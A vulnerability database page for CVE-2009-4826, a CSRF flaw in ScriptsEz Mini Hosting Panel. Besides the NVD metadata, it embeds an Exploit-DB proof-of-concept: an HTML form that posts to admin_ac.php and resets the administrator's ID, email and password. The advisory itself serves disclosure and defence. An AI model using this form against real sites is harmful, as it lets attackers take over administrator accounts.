Search...

CVE-2009-4826

2010-04-27T11:30:01

ID CVE-2009-4826
Type cve
Reporter NVD
Modified 2010-05-24T00:00:00

Description

Cross-site request forgery (CSRF) vulnerability in hosting/admin_ac.php in ScriptsEz Mini Hosting Panel allows remote attackers to hijack the authentication of administrators for requests that alter administrative settings via a cp action.

JSON Vulners Source

Initial Source

{"viewCount": 0, "lastseen": "2016-09-03T13:17:49", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "type": "cve", "description": "Cross-site request forgery (CSRF) vulnerability in hosting/admin_ac.php in ScriptsEz Mini Hosting Panel allows remote attackers to hijack the authentication of administrators for requests that alter administrative settings via a cp action.", "assessment": {"name": "", "system": "", "href": ""}, "reporter": "NVD", "published": "2010-04-27T11:30:01", "history": [], "title": "CVE-2009-4826", "cpe": ["cpe:/a:scriptsez:mini_hosting_panel"], "bulletinFamily": "NVD", "edition": 1, "scanner": [], "id": "CVE-2009-4826", "cvelist": ["CVE-2009-4826"], "hash": "b4de52321b8d4b723592d8f24a694943a224749e849c0dee997ab045c86c5499", "modified": "2010-05-24T00:00:00", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4826", "objectVersion": "1.2", "references": ["http://www.exploit-db.com/exploits/10444", "http://www.vupen.com/english/advisories/2009/3525"], "enchantments": {"score": {"value": 6.8, "vector": "NONE", "modified": "2016-09-03T13:17:49"}, "vulnersScore": 6.8}}

{"exploitdb": [{"lastseen": "2016-02-01T12:30:44", "osvdbidlist": ["61058"], "references": [], "description": "mini Hosting Panel XSRF Change Admin Settings. CVE-2009-4826. Webapps exploit for php platform", "edition": 1, "reporter": "Milos Zivanovic ", "published": "2009-12-14T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "mini Hosting Panel - CSRF Change Admin Settings", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4826"], "modified": "2009-12-14T00:00:00", "id": "EDB-ID:10444", "href": "https://www.exploit-db.com/exploits/10444/", "sourceData": "[#-----------------------------------------------------------------------------------------------#]\r\n[#] Title: mini Hosting Panel XSRF Change Admin Settings\r\n[#] Author: Milos Zivanovic\r\n[#] Email: milosz.security[at]gmail.com\r\n[#] Date: 14. December 2009.\r\n[#-----------------------------------------------------------------------------------------------#]\r\n[#] Application: mini Hosting Panel\r\n[#] Version: the only one there is\r\n[#] Platform: PHP\r\n[#] Link: http://www.scriptsez.net/?action=details&cat=Miscellaneous&id=1193932045\r\n[#] Price: 24 USD\r\n[#] Vulnerability: XSRF Change Admin Settings\r\n[#-----------------------------------------------------------------------------------------------#]\r\n\r\nmini Hosting Panel script suffers from XSRF vulnerability that enables\r\nus to change\r\nadmins info such as id, password, email...\r\n\r\n[EXPLOIT------------------------------------------------------------------------------------------]\r\n<form action=\"http://localhost/hosting/admin_ac.php?action=cp\" method=\"POST\">\r\n <input type=\"hidden\" name=\"nid\" value=\"new_admin\">\r\n <input type=\"hidden\" name=\"email\" value=\"my@mail.com\">\r\n <input type=\"hidden\" name=\"comp\" value=\"Company\">\r\n <input type=\"hidden\" name=\"np\" value=\"hacked\">\r\n <input type=\"hidden\" name=\"cnp\" value=\"hacked\">\r\n <input type=\"submit\" name=\"submit\" value=' Submit '>\r\n</form>\r\n[EXPLOIT------------------------------------------------------------------------------------------]\r\n\r\n[#]EOF\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/10444/"}]}